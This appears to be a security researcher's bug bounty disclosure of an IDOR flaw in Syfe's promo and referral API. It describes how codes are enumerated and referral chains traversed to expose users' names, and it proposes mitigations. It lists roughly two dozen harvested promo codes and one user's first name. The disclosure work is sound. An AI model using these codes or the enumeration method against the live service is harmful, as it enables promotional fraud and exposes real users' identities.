Syfe
Last updated
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in Syfe’s promo code system, allowing unauthorized access to valid referral codes and exposing invitee names. This flaw could be exploited to fraudulently redeem promo codes, leading to financial losses, and reputational damage. Additionally, a deeper issue was identified in the referral system, which exposes a hierarchical structure of users by iterating over referrerAppliedCode, potentially leading to mass user data exposure.
The invite system uses API endpoints like:
The server responds with a 200 OK, revealing valid promo code details.
The referrerAppliedCode field remains null, indicating unused promo codes that could be exploited.
The promo codes are also accessible via:
This endpoint exposes the referrer’s name (e.g., Sze Wei), leading to potential privacy violations.
Categorization of Promo Codes Based on Referral Status:
Codes Without a Referrer (referrerAppliedCode: NULL):
SRP16LW72, SRPQ9XPUD, SRPS4H3NH, SRPVW9182, SRPRRBGSF, SRPRYKNMN, SRPSURFGP, SRPSSMRCG, SRPSSMNGY, SRPSXQDTY, SRPT2KZFA, SRP6X8B8Y, SRPTEBYFA, SRPTGPUD2, SRPTNFL5D, SRPTUW33H, sgsmi, NOMONEYLAH
Codes with an Existing Referrer (referrerAppliedCode: <code>):
SRP6G4YN8, SRPRDR9KS, SRPS4P5YC, SRPSL8MGX, SRPT54W4C, SRPTXDRBM, SRPSTTW7Y, SRPTJDXHM, SRPTH8LK3
Mapping User Referral Hierarchy:
By leveraging the referrerAppliedCode value in a request, it is possible to retrieve another user’s referrerId and firstName.
By following the referrerAppliedCode chain, it is possible to reconstruct a tree-like structure of referrals.
Requesting /promo/referral/SRPTXDRBM returns:
Using SRPSTTW7Y in a new request reveals another user:
Continuing this process (with the others PROMOCodes that i've found) reveals a full referral tree, potentially exposing thousands of user identities.
Entropy analysis of referral codes identified a predictable pattern in their structure, making enumeration feasible.
Attempting to redeem a retrieved promo code results in: "Promo code is currently under review. You will receive the benefits if you meet all the terms and conditions of the promos."
This suggests attackers could create fake accounts to exploit promotional bonuses.
For this case I will leave you a super fast video as a proof of concept explaining the step by step from burp and the step by step easy:
that's all
Financial Fraud: Attackers can mass-harvest promo codes, create fake accounts, and exploit referral rewards, causing significant financial losses.
User Data Exposure: Real names and referral relationships are publicly accessible, leading to privacy breaches and phishing risks.
Reputation Damage: Public exposure of invitee data erodes user trust, potentially harming the company’s credibility and compliance standing.
Hierarchical Exposure: Attackers can map user referral chains, enabling targeted scams and account takeovers.
Remove referrerId and referrerAppliedCode from public responses.
Restrict access to promo codes, requiring authentication.
Increase entropy in promo code generation to prevent easy enumeration.
Enforce additional validation before applying promo codes.
Monitor exploitation attempts through logging and rate limiting.
This IDOR vulnerability exposes promo codes and user invite details, allowing unauthorized use and potential fraud. The ability to traverse the referral hierarchy further exacerbates the risk, exposing user relationships and identifiers. Mitigating this issue will prevent abuse and reinforce user trust in Syfe’s security framework.
Thank you,
Juan Felipe - Security Researcher
open URL: <code> and replace with the PromoCodes of this report in section 3. Categorization of Promo Codes Based on Referral Status
Open URL Syfe Main Website: <code>
